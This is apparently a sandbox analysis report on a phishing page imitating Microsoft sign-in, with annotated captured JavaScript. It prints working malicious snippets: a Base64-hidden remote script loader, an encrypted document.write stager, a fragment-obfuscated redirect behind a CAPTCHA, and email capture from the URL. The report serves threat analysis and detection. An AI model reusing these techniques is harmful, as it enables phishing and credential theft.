URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High risk due to multiple concerning factors: 1) Uses base64 obfuscation to hide URL (3 points), 2) Dynamically injects external script into document head (3 points), 3) Suspicious domain 'kavanaltd.com' not associated with legitimate services (2 points). The presence of an email placeholder suggests potential data collection/exfiltration capabilities in the loaded script."
} |
// Captured sample. "%EMAIL%" is an unfilled template placeholder; `payd` is not read in this
// snippet, so it is presumably consumed by the script loaded below — confirm against that script.
var payd = "%EMAIL%";
// Second-stage loader: the script URL is wrapped in atob() so it never appears as a literal in
// the page. The Base64 decodes to hxxps://kavanaltd[.]com/news/index[.]php (defanged), and whatever
// that endpoint returns runs with this page's origin and DOM access.
// Detection: a <script> element appended to <head> whose src is computed at runtime via atob().
document.head.append(Object.assign(document.createElement("script"), {src: atob("aHR0cHM6Ly9rYXZhbmFsdGQuY29tL25ld3MvaW5kZXgucGhw")}));
|
URL: :// Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: :// |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is a legitimate implementation of Cloudflare's Turnstile CAPTCHA system. It uses a standard configuration pattern with a valid sitekey format, callback functions for verification and expiration, and runs within the expected window.onload context. No suspicious behaviors or data exfiltration patterns are present."
} |
// Registers a global named onloadTurnstileCallback that renders a Cloudflare Turnstile widget
// into #turnstileCaptcha. It is assigned as a property, not as window.onload; presumably the
// Turnstile script tag names it as its onload hook (tag not shown here).
// In isolation this is ordinary widget setup. In this capture the success handler is
// verifyCallback_CF, which elsewhere on the page redirects to login.protiv-bubuljica[.]info,
// so the challenge acts as a gate in front of that redirect.
window.onloadTurnstileCallback = function () {
turnstile.render("#turnstileCaptcha", {
sitekey: "0x4AAAAAAA1E-km6p2OSxRUM",
// Called when the challenge is solved.
callback: verifyCallback_CF,
// Called when the token expires; refreshCallBack reloads the page.
"expired-callback": refreshCallBack,
// "error-callback": switchToSecondCaptcha(),
})
}
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High-risk script that loads crypto-js library and performs suspicious encryption operations. It uses document.write() with decrypted content, which could inject malicious code. The use of Base64 encoding and AES encryption to obscure the actual payload is a common malware technique. The script appears to be deliberately obfuscated with random variable names."
} |
// Encrypted-payload stager. Loads the public crypto-js 4.2.0 build from cdnjs, then decrypts an
// embedded blob and writes the plaintext into the document. The library is the legitimate one;
// the CDN URL alone is not an indicator.
var KCKCPkBUrR = document.createElement("script");
KCKCPkBUrR.setAttribute("src", "https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js");
document.head.append(KCKCPkBUrR);
// Decryption runs only after the library has loaded.
KCKCPkBUrR.onload = function() {
// Single Base64 blob carrying salt, IV and ciphertext back to back.
const sSPCONpBtJ = CryptoJS.enc.Base64.parse("ER3YxrNKnGMEfT2nbMt/W9h2ymCd0xcaaubjIVA+z28C9drn6jfKp/nLa2Tc+X5TTrzRKZP5rWyyHG3p4aemNQKsGszFGmEF1RzV2ryeZQwuBIdV5uZ+sUYwLSgLknQxFB4apfcAkUFC+1p9PHclkvoWT9eYSwoXrFdNrObuvFF8DzjS+qFyZ28lRuJO1Wlr9er+JZ1VHCOTkdel9BA4TQTclXg4aILIPVwWw9U759LS5kLjzbSIZoi8SEhAxIAnY3kAViXr2tUMLIFqUoq78SoQIDMsoPMJH7jbk0FkqExO/x0ep5amZh79oNcMF5UY");
// Words 0-3 (16 bytes): used as the PBKDF2 salt.
const iCxvvXgAEz = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(0, 4));
// Words 4-7 (16 bytes): used as the AES IV.
const VQGkYtxNuP = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(4, 8));
// Remaining words: the ciphertext.
const boqYZyIQln = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(8));
// Key derivation from a passphrase hard-coded in the page: 8 words (256 bits), 1000 iterations.
const BoetwppTXx = CryptoJS.PBKDF2("uzTvAiTWBoGECqGxawiNKQcmXWYacTkJ", iCxvvXgAEz, {
keySize: 256 / 32,
iterations: 1000
});
// Mode and padding are not set here, so the library defaults apply.
const qyfZVmWZoL = CryptoJS.AES.decrypt({ ciphertext: boqYZyIQln }, BoetwppTXx, {
iv: VQGkYtxNuP
});
// The decrypted text is written as markup, so any script it contains executes in this origin.
// Passphrase, salt, IV and ciphertext all ship in the page: the encryption hides the payload
// from static content inspection, not from an analyst, who can recover it offline without
// running the page. Detection: document.write() fed by an AES/PBKDF2 decrypt of an inline blob.
document.write(qyfZVmWZoL.toString(CryptoJS.enc.Utf8));
};
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "Script shows high-risk behavior with obfuscated URL construction (splitting 'https' into individual characters) and uses window.location.assign for redirection. The incomplete URL string and obfuscation technique are common in malicious scripts attempting to bypass security filters. The use of a callback function named 'verifyCallback_CF' suggests potential manipulation of verification processes."
} |
var verifyCallback_CF = function (response) {
console.log("verified");
window.location.assign('h' + 't' + 't' + 'ps
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The script performs basic DOM manipulation to switch between CAPTCHA forms and includes a refresh callback. It uses standard DOM methods, setTimeout for timing, and basic visibility toggles. No data exfiltration, suspicious domains, or malicious patterns detected. The behavior is consistent with legitimate CAPTCHA implementation practices."
} |
// Fallback from the Turnstile form (#cfForm) to a second form (#gForm): removes #cfForm after
// 200 ms, then makes #gForm visible 200 ms later. validateElement is defined outside this capture.
window.switchToSecondCaptcha = function () {
console.log("CAPTCHA switch callback activated")
let gForm = document.querySelector("#gForm")
// NOTE(review): other call sites on this page treat a truthy validateElement() as "element is
// usable", which would make this guard return whenever #gForm exists; the second operand also
// compares the style object itself rather than style.visibility. Observed behaviour may
// therefore differ from the apparent intent — confirm against validateElement's definition.
if (validateElement(gForm) || gForm.style == "visible") {
return
}
setTimeout(function () {
const cfForm = document.querySelector("#cfForm")
// Remove the Turnstile form unless it is already hidden.
if (validateElement(cfForm) && cfForm.style.visibility != "hidden") {
cfForm.remove()
}
setTimeout(function () {
gForm.style.visibility = "visible"
}, 200)
}, 200)
}
// Registered as Turnstile's "expired-callback" elsewhere on this page: logs, then reloads the
// page after one second so a fresh challenge is issued. The `response` argument is unused.
var refreshCallBack = function (response) {
console.log("Refresh callback activated")
setTimeout(function () {
window.location.reload()
}, 1000)
}
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate implementation of the CryptoJS library. It contains standard cryptographic operations and uses native crypto modules when available. The code is not obfuscated and follows proper module export patterns. The only minor risk factors are the use of eval-like patterns in module definition (define/AMD) and dynamic property access, but these are standard practices for this type of library."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var W,O,I,U,K,X,L,l,j,T,t,N,q,e,Z,V,G,J,Q,Y,$,t1,e1,r1,i1,o1,n1,s,s1,c1,a1,h1,l1,o,f1,r,d1,u1,n,c,a,h,f,d,i=function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},o=t.lib={},n=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=o.WordArray=n.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,o=t.sigBytes;if(this.clamp(),i%4)for(var n=0;n<o;n++){var s=r[n>>>2]>>>24-n%4*8&255;e[i+n>>>2]|=s<<24-(i+n)%4*8}else for(var c=0;c<o;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=o,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=n.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new 
Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],o=0;o<r;o++){var n=e[o>>>2]>>>24-o%4*8&255;i.push((n>>>4).toString(16)),i.push((15&n).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],o=0;o<r;o++){var n=e[o>>>2]>>>24-o%4*8&255;i.push(String.fromCharCode(n))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=o.BufferedBlockAlgorithm=n.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,o=r.sigBytes,n=this.blockSize,s=o/(4*n),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*n,t=h.min(4*c,o);if(c){for(var a=0;a<c;a+=n)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=t}return new l.init(e,t)},clone:function(){var t=n.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(o.Hasher=d.extend({cfg:n.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new 
r.init(e).finalize(t)}},_createHmacHelper:function( |
URL: https://login.protiv-bubuljica.info/HaNkgGIY# Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "High-risk script that exhibits multiple suspicious behaviors: 1) Uses string concatenation to obfuscate a URL (+3 points), 2) Redirects to a suspicious domain with unusual TLD (.info) and suspicious subdomain structure (+3 points), 3) Contains random-looking query parameters suggesting potential malicious intent (+2 points), 4) Domain appears designed to mimic legitimate services (+1 point). Pattern matches common phishing redirect techniques."
} |
// Turnstile success handler: navigates the victim onward once the challenge is solved.
// The `response` token is never verified or sent anywhere in this function, so the CAPTCHA
// serves only as a gate in front of the redirect.
var verifyCallback_CF = function (response) {
console.log("verified");
// The destination is split into short fragments so the URL never appears as one literal.
// Concatenated, it is hxxps://login.protiv-bubuljica[.]info/HaNkgGIY?n=2dV0iQc (defanged).
// String-matching on the full URL will miss this; evaluate the expression or match on the
// navigation itself.
window.location.assign('h' + 't' + 't' + 'ps:' + '//l' + 'og' + 'in' + '.' + 'pro' + 't' + 'iv-' + 'b' + 'ubu' + 'lji' + 'ca.' + 'in' + 'fo' + '/' + 'HaN' + 'k' + 'gGI' + 'Y' + '?n' + '=2d' + 'V0' + 'i' + 'Qc');
};
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The script appears to be a legitimate loader/spinner implementation with captcha form switching functionality. It only performs DOM manipulation using standard querySelector methods and visibility changes. The timeouts and intervals are used for a loading animation effect. No external data transmission, suspicious domains, or potentially harmful operations are present. The code follows common UI/UX patterns for handling loading states and form visibility."
} |
// Appends one "." to the #cf-spinner-please-wait text while #gForm exists and is hidden.
// Cosmetic only: it animates the "please wait" interstitial. validateElement is defined outside
// this capture.
var incrementLoader = function () {
const waitp = document.querySelector("#cf-spinner-please-wait")
const gForm = document.querySelector("#gForm")
if (validateElement(gForm) && gForm.style.visibility == "hidden") {
waitp.textContent += "."
}
}
// After 500 ms, start a one-second ticker that calls incrementLoader and stops itself once the
// counter exceeds 3 (four ticks in total).
setTimeout(() => {
let i = 0
// `ticker` is assigned without a declaration in this snippet.
ticker = setInterval(function () {
i += 1
incrementLoader()
if (i > 3) {
clearInterval(ticker)
return
}
}, 1000)
}, 500)
// Seven-second watchdog: if the Turnstile form is missing, or is still showing while the second
// form is not, fall back to the second CAPTCHA form.
setTimeout(function () {
const cfForm = document.querySelector("#cfForm")
if (!validateElement(cfForm)) {
switchToSecondCaptcha()
return
}
const gForm = document.querySelector("#gForm")
if (!validateElement(gForm)) {
// nothing to switch to
return
}
if (cfForm.style.visibility == "visible" || gForm.style.visibility != "visible") {
switchToSecondCaptcha()
}
}, 7000)
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "Script performs basic URL parsing and local storage operations. While it stores email from URL fragment which could be a minor security concern (potentially part of a tracking system), it uses standard browser APIs and doesn't transmit data externally. No malicious patterns detected, though storing PII (email) in localStorage without encryption is a suboptimal practice."
} |
// Reads whatever follows '#' in the page URL and stores it in localStorage under 'email'.
// Analyst context: the landing URLs in this report end in '#', and another snippet on the page
// carries an "%EMAIL%" placeholder, so the fragment is presumably where the lure delivers the
// recipient's address. URL fragments are not sent in HTTP requests, so proxy and web-server logs
// will not show the address even when the lure link carries one.
var aemail = "";
console.log(window.location.href.split('#'));
if(window.location.hash) {
// hash is "#value", so split("#") yields ["", "value"]; index 1 is the text after the first '#'.
const myArr = window.location.hash.split("#");
aemail = myArr[1];
}
console.log(aemail)
// Nothing is transmitted here, but any other script running on this origin can read these keys
// back later; localStorage persists across reloads on the same origin.
localStorage.setItem('email', aemail);
// Marker flag; its consumer is not visible in this capture.
localStorage.setItem('everthingood', "true");
const cat = localStorage.getItem('email');
console.log(cat)
|
URL: https://login.protiv-bubuljica.info/HaNkgGIY# Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.protiv-bubuljica.info Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://login.protiv-bubuljica.info |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Promise polyfill implementation from hCaptcha (as indicated by the license comment). It implements standard Promise functionality and fallbacks, using only standard JavaScript features. No suspicious behaviors like eval(), external data transmission, or DOM manipulation are present. The code is not obfuscated and comes from a trusted source."
} |
/* https://hcaptcha.com/license */
!function(){"use strict";function t(t){var e=this.constructor;return this.then((function(i){return e.resolve(t()).then((function(){return i}))}),(function(i){return e.resolve(t()).then((function(){return e.reject(i)}))}))}function e(t){return new this((function(e,i){if(!t||"undefined"==typeof t.length)return i(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var n=Array.prototype.slice.call(t);if(0===n.length)return e([]);var r=n.length;function o(t,i){if(i&&("object"==typeof i||"function"==typeof i)){var s=i.then;if("function"==typeof s)return void s.call(i,(function(e){o(t,e)}),(function(i){n[t]={status:"rejected",reason:i},0==--r&&e(n)}))}n[t]={status:"fulfilled",value:i},0==--r&&e(n)}for(var s=0;s<n.length;s++)o(s,n[s])}))}var i=setTimeout,n="undefined"!=typeof setImmediate?setImmediate:null;function r(t){return Boolean(t&&"undefined"!=typeof t.length)}function o(){}function s(t){if(!(this instanceof s))throw new TypeError("Promises must be constructed via new");if("function"!=typeof t)throw new TypeError("not a function");this._state=0,this._handled=!1,this._value=undefined,this._deferreds=[],f(t,this)}function a(t,e){for(;3===t._state;)t=t._value;0!==t._state?(t._handled=!0,s._immediateFn((function(){var i=1===t._state?e.onFulfilled:e.onRejected;if(null!==i){var n;try{n=i(t._value)}catch(r){return void c(e.promise,r)}l(e.promise,n)}else(1===t._state?l:c)(e.promise,t._value)}))):t._deferreds.push(e)}function l(t,e){try{if(e===t)throw new TypeError("A promise cannot be resolved with itself.");if(e&&("object"==typeof e||"function"==typeof e)){var i=e.then;if(e instanceof s)return t._state=3,t._value=e,void h(t);if("function"==typeof i)return void f((n=i,r=e,function(){n.apply(r,arguments)}),t)}t._state=1,t._value=e,h(t)}catch(o){c(t,o)}var n,r}function c(t,e){t._state=2,t._value=e,h(t)}function 
h(t){2===t._state&&0===t._deferreds.length&&s._immediateFn((function(){t._handled||s._unhandledRejectionFn(t._value)}));for(var e=0,i=t._deferreds.length;e<i;e++)a(t,t._deferreds[e]);t._deferreds=null}function u(t,e,i){this.onFulfilled="function"==typeof t?t:null,this.onRejected="function"==typeof e?e:null,this.promise=i}function f(t,e){var i=!1;try{t((function(t){i||(i=!0,l(e,t))}),(function(t){i||(i=!0,c(e,t))}))}catch(n){if(i)return;i=!0,c(e,n)}}s.prototype["catch"]=function(t){return this.then(null,t)},s.prototype.then=function(t,e){var i=new this.constructor(o);return a(this,new u(t,e,i)),i},s.prototype["finally"]=t,s.all=function(t){return new s((function(e,i){if(!r(t))return i(new TypeError("Promise.all accepts an array"));var n=Array.prototype.slice.call(t);if(0===n.length)return e([]);var o=n.length;function s(t,r){try{if(r&&("object"==typeof r||"function"==typeof r)){var a=r.then;if("function"==typeof a)return void a.call(r,(function(e){s(t,e)}),i)}n[t]=r,0==--o&&e(n)}catch(l){i(l)}}for(var a=0;a<n.length;a++)s(a,n[a])}))},s.allSettled=e,s.resolve=function(t){return t&&"object"==typeof t&&t.constructor===s?t:new s((function(e){e(t)}))},s.reject=function(t){return new s((function(e,i){i(t)}))},s.race=function(t){return new s((function(e,i){if(!r(t))return i(new TypeError("Promise.race accepts an array"));for(var n=0,o=t.length;n<o;n++)s.resolve(t[n]).then(e,i)}))},s._immediateFn="function"==typeof n&&function(t){n(t)}||function(t){i(t,0)},s._unhandledRejectionFn=function(t){"undefined"!=typeof console&&console&&console.warn("Possible Unhandled Promise Rejection:",t)};var d=function(){if("undefined"!=typeof self)return self;if("undefined"!=typeof window)return window;if("undefined"!=typeof global)return global;throw new Error("unable to locate global object")}();function p(t,e,i){return e<=t&&t<=i}function y(t){if(t===undefined)return{};if(t===Object(t))return t;throw TypeError("Could not convert argument to dictionary")}"function"!=typeof 
d.Promise?d.Promise=s:(d.Promise.prototype["finally"]||(d.Promise.prototype["finally"]=t),d.Promise.allSettled| |
URL: https://login.protiv-bubuljica.info/HaNkgGIY# Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Please stand by, while we are checking if the site connection is secure",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: https://login.protiv-bubuljica.info/HaNkgGIY# Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Trying to sign you in",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.protiv-bubuljica.info' does not match the legitimate domain for Microsoft.", "The domain 'protiv-bubuljica.info' is unrelated to Microsoft and appears suspicious.", "The use of a non-Microsoft domain with Microsoft branding is a common phishing tactic.", "The presence of input fields for 'Email, phone, or Skype' suggests an attempt to collect sensitive information under the guise of Microsoft." ], "riskscore": 9}
Google indexed: False |
URL: login.protiv-bubuljica.info
Brands: Microsoft
Input Fields: Email, phone, or Skype |
URL: https://protiv-bubuljica.info Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://protiv-bubuljica.info |